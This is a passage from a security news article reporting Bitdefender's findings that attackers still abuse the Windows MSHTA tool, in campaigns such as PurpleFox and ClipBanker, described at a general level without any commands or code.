A legacy Windows tool that refuses to die: Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers like. These include it being Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments.Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands that downloaded MSI payloads posing as PNG images from remote IP addresses.PurpleFox, once installed, operates as a rootkit-enabled backdoor capable of persistence, surveillance, information theft, and distributed denial-of-service (DOS) activity.Elsewhere, ClipBanker campaigns used HTA loaders to execute Base64-encoded PowerShell commands that established persistence through scheduled tasks posing as legitimate Windows services. The malware ultimately hijacked cryptocurrency wallet addresses copied to victims’ clipboards.Bitdefender cautioned that not every MSHTA execution is inherently malicious. ” A significant portion of detections came from the update mechanism of DriverPack, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels,” the researchers pointed out.Still, they argued the balance has clearly shifted toward abuse.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4173096/internet-explorer-may-be-dead-but-its-ghost-still-runs-malware.html
